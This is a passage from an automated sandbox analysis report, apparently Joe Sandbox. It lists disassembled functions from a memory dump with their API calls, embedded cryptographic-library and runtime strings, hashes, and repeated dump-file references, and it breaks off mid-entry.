                                            • Instruction ID: fd51bdb807e2ebbc8d74ac0845fba01d81a92ec2d241fa8616d29308e58c3b1f
                                            • Opcode Fuzzy Hash: 3b634758f0966af0e70e11fc79744c80d4bc2fcfa4ddb68e88bf60342d6b9cdd
                                            • Instruction Fuzzy Hash: 2F51D8352087409FC3248F64D894A2BB7FEAFD634CF848A5DF4E657241D727E8098752
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 666b0ebb4d186cc58868725c4e3c550f9e0af86e61ae0607314341ae58fc6afe
                                            • Instruction ID: 044633019ec17344eba35cbc4eb255d1f30d4881ab98d17bc5c3c6eb6cacca28
                                            • Opcode Fuzzy Hash: 666b0ebb4d186cc58868725c4e3c550f9e0af86e61ae0607314341ae58fc6afe
                                            • Instruction Fuzzy Hash: 8151F6352083449FCB108F65C894A37B7FEAFD625CF888A1DE4E68B281D766E809C751
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 68981C1A
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • __CxxThrowException@8.LIBCMT ref: 68981CDE
                                            • __CxxThrowException@8.LIBCMT ref: 68981D3E
                                            Strings
                                            • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 68981CF0
                                            • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 68981C67
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                            • API String ID: 3476068407-3371871069
                                            • Opcode ID: 87f45b0a97601e4836e6faf5b7eb912ed05b34db02d7efa87d62835a6a1a4ebc
                                            • Instruction ID: bcc1d27b35355e975385f45009b1ddfc00a4f629941469e7901e05bc692eb0fb
                                            • Opcode Fuzzy Hash: 87f45b0a97601e4836e6faf5b7eb912ed05b34db02d7efa87d62835a6a1a4ebc
                                            • Instruction Fuzzy Hash: EF5156752087419FD320DF68C880FAEB7E9BFD8304F508A1DE59987391DB71E9058BA2
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6894211F
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 68944010: _memmove.LIBCMT ref: 689440C8
                                            • __CxxThrowException@8.LIBCMT ref: 689421BF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: 8Aj?Q$PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                            • API String ID: 1902190269-3880593685
                                            • Opcode ID: c1e3a242d6eff9a9f7f38d700787d4bdb714e3ae9d77da3116f3600b96285468
                                            • Instruction ID: f9bdf18df54770a7e725455259af0e8de8853eba176541a7bad0bb0a26394128
                                            • Opcode Fuzzy Hash: c1e3a242d6eff9a9f7f38d700787d4bdb714e3ae9d77da3116f3600b96285468
                                            • Instruction Fuzzy Hash: 0A415D70C4428CAFDB10DFE9D890AEDFBB8BB19314F904259E421A7681DB759608CF51
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A913A
                                              • Part of subcall function 689A9125: __CxxThrowException@8.LIBCMT ref: 689A914F
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A9160
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689440C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 1615890066-4289949731
                                            • Opcode ID: 2007e07723adc3308c99aa28af48cd5aa2a0c1ff673294e0e47f7a2601b59c07
                                            • Instruction ID: d1bcd90132ba795afe245f8be11416c390f3c18d1a5d0a7bd49f4fd9645d6b2a
                                            • Opcode Fuzzy Hash: 2007e07723adc3308c99aa28af48cd5aa2a0c1ff673294e0e47f7a2601b59c07
                                            • Instruction Fuzzy Hash: 2031CA327051109BD7308E5CE840A6EF7A9EB91769F60052FF152CB241D772D8528BA1
                                            APIs
                                            • QueryPerformanceFrequency.KERNEL32(Aj?Q,513F6A41), ref: 689A8E7F
                                            • GetLastError.KERNEL32(0000000A), ref: 689A8E8F
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 689A8F14
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$Timer: QueryPerformanceFrequency failed with error
                                            • API String ID: 2175244869-2664654878
                                            • Opcode ID: 8bb37f335ff4ffe2037a02c7492a43590f19aabe96085c98279b5c3f234f515b
                                            • Instruction ID: 414dfd6ca94ac53a722e38e99c29904b593d2aea03b953e8cfb78875a65d01e1
                                            • Opcode Fuzzy Hash: 8bb37f335ff4ffe2037a02c7492a43590f19aabe96085c98279b5c3f234f515b
                                            • Instruction Fuzzy Hash: 8D211BB550C3809FD320DF24C845BAFBBE8BF99654F804A1DF5A992281D776D5048FA3
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(Aj?Q,513F6A41,?,00000000), ref: 689A8F7F
                                            • GetLastError.KERNEL32(0000000A,?,00000000), ref: 689A8F8F
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 689A9014
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$Timer: QueryPerformanceCounter failed with error
                                            • API String ID: 1823523280-516466703
                                            • Opcode ID: e10f77302a97a0b4c2c3bd2bc9a04c9d5a13472f252159785442567c2aba3b78
                                            • Instruction ID: 6e1508531096989ed7558a4edd30d67f90ef3c9bcdf4e3166fa238a58cadc93b
                                            • Opcode Fuzzy Hash: e10f77302a97a0b4c2c3bd2bc9a04c9d5a13472f252159785442567c2aba3b78
                                            • Instruction Fuzzy Hash: 62211D7550C3809FD320DF24C885B5FB7E8BF99658F804A1DF5A992281D776D5048B93
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 68976518
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • __CxxThrowException@8.LIBCMT ref: 68976558
                                            Strings
                                            • Aj?Q, xrefs: 68976535, 68976539
                                            • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 68976527
                                            • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 689764E7
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: Aj?Q$Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                            • API String ID: 3476068407-86892893
                                            • Opcode ID: d1d84b9ed20a883475754f5afc18bf94e3b8b706db9574f00baf92fd71dcd74e
                                            • Instruction ID: 1c052b45ff32aa376fc23ac32f67682a87ce383574da0c7c3d46574199d7edc4
                                            • Opcode Fuzzy Hash: d1d84b9ed20a883475754f5afc18bf94e3b8b706db9574f00baf92fd71dcd74e
                                            • Instruction Fuzzy Hash: B921DC755183809FC335CF64C844FAEB3E8BBAA648FC04A1DE69982280EB35D404CA63
                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 689AC24E
                                              • Part of subcall function 689AC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 689AC1DF
                                            • _UnwindNestedFrames.LIBCMT ref: 689AC265
                                            • ___FrameUnwindToState.LIBCMT ref: 689AC273
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                            • String ID: csm$csm
                                            • API String ID: 2163707966-3733052814
                                            • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                            • Instruction ID: a208f8618cdaf4d611f9be575f80899c10bb3eab6e6e7836af12afdcb8b545c5
                                            • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                            • Instruction Fuzzy Hash: 35011935401109BBDF125F91DC45EEA7F6AFF18358F804010FD2829120D736D9B2DBA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: cda871cac77564ebcf83658c26e028a016719b2e6c5b06a5ef787b957d459643
                                            • Instruction ID: 83fcb7a58536dc7bd07c1c0e474b0d7679d292e5ba3157fbf6026adc633830c5
                                            • Opcode Fuzzy Hash: cda871cac77564ebcf83658c26e028a016719b2e6c5b06a5ef787b957d459643
                                            • Instruction Fuzzy Hash: 07915BB56087029FD714DFA9D990A2BB7E9FF8C704F504A2DE4A5C3340E735E9058BA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Timetime$Sleep
                                            • String ID:
                                            • API String ID: 4176159691-0
                                            • Opcode ID: 905bb7a7b58fa0a307d6046f053c047df59a962cc89687bb79b5f3c09086a919
                                            • Instruction ID: be136d9e241ceefce95bbf9d277aa5dfb161590cce6d1ac0b8a8a2c7ac816513
                                            • Opcode Fuzzy Hash: 905bb7a7b58fa0a307d6046f053c047df59a962cc89687bb79b5f3c09086a919
                                            • Instruction Fuzzy Hash: 9D51B2B59042449FEF10DFA8C89979EBFB8BF16708F94447AE859D7240D371D940CB92
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • _rand.LIBCMT ref: 68956DEA
                                              • Part of subcall function 689A9E0C: __getptd.LIBCMT ref: 689A9E0C
                                            • std::exception::exception.LIBCMT ref: 68956E17
                                            • __CxxThrowException@8.LIBCMT ref: 68956E2C
                                            • std::exception::exception.LIBCMT ref: 68956E3B
                                            • __CxxThrowException@8.LIBCMT ref: 68956E50
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                            • String ID:
                                            • API String ID: 2791304714-0
                                            • Opcode ID: f8b5cbce0389235ec67c095671b30074e3e679c891f3cf25ea57f8ceaf98df4e
                                            • Instruction ID: 52300e2470fe3d40f7c33aa6b3c4cc019879d9a538b556c75479839003b46fdd
                                            • Opcode Fuzzy Hash: f8b5cbce0389235ec67c095671b30074e3e679c891f3cf25ea57f8ceaf98df4e
                                            • Instruction Fuzzy Hash: 053117B59007449FCB60CF68C880A9AFBF4FB18314F84896ED86A97B41D776E604CF61
                                            APIs
                                            • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 68957761
                                            • LeaveCriticalSection.KERNEL32(00000000,?), ref: 68957782
                                            • EnterCriticalSection.KERNEL32(00000018), ref: 68957796
                                            • LeaveCriticalSection.KERNEL32(00000018), ref: 689577CE
                                            • QueueUserWorkItem.KERNEL32(68971D50,00000000,00000010), ref: 6895780C
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                            • String ID:
                                            • API String ID: 584243675-0
                                            • Opcode ID: 3da02ae85516136325a9ee3c65f446ab7e32472db06ade6d302ab003cbe40419
                                            • Instruction ID: 6e7a57061fbd804a1c8ca99247e8c9c37fe888518057cd587c3e0326cae7e0a4
                                            • Opcode Fuzzy Hash: 3da02ae85516136325a9ee3c65f446ab7e32472db06ade6d302ab003cbe40419
                                            • Instruction Fuzzy Hash: 3C21AE76545208AFCB10CF64D884AAFBBF8FB45704F80C869E9668B640D731E658CBA1
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 68945ACB
                                              • Part of subcall function 689A9533: std::exception::_Copy_str.LIBCMT ref: 689A954E
                                            • __CxxThrowException@8.LIBCMT ref: 68945ABC
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • __CxxThrowException@8.LIBCMT ref: 68945AE0
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68945B18
                                            • __CxxThrowException@8.LIBCMT ref: 68945B2D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
